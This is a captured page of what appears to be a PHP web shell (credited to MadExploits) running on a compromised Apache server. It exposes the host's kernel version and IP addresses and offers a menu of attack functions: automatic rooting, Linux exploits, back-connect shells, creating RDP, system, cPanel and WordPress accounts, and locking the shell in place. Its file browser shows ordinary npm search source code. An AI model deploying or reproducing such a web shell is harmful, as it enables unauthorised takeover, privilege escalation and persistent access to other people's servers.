Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.138.121.183
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
lib /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
all-package-metadata.js
11.75
KB
-rw-r--r--
all-package-search.js
1.52
KB
-rw-r--r--
format-package-stream.js
4.25
KB
-rw-r--r--
package-filter.js
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : all-package-search.js
var ms = require('mississippi') var allPackageMetadata = require('./all-package-metadata') var packageFilter = require('./package-filter.js') module.exports = allPackageSearch function allPackageSearch (opts) { var searchSection = (opts.unicode ? '🤔 ' : '') + 'search' // Get a stream with *all* the packages. This takes care of dealing // with the local cache as well, but that's an internal detail. var allEntriesStream = allPackageMetadata(opts) // Grab a stream that filters those packages according to given params. var filterStream = streamFilter(function (pkg) { opts.log.gauge.pulse('search') opts.log.gauge.show({section: searchSection, logline: 'scanning ' + pkg.name}) // Simply 'true' if the package matches search parameters. var match = packageFilter(pkg, opts.include, opts.exclude, { description: opts.description }) return match }) return ms.pipeline.obj(allEntriesStream, filterStream) } function streamFilter (filter) { return ms.through.obj(function (data, enc, cb) { if (filter(data)) { this.push(standardizePkg(data)) } cb() }) } function standardizePkg (data) { return { name: data.name, description: data.description, maintainers: (data.maintainers || []).map(function (m) { return { username: m.name, email: m.email } }), keywords: data.keywords || [], version: Object.keys(data.versions || {})[0] || [], date: ( data.time && data.time.modified && new Date(data.time.modified) ) || null } }
Close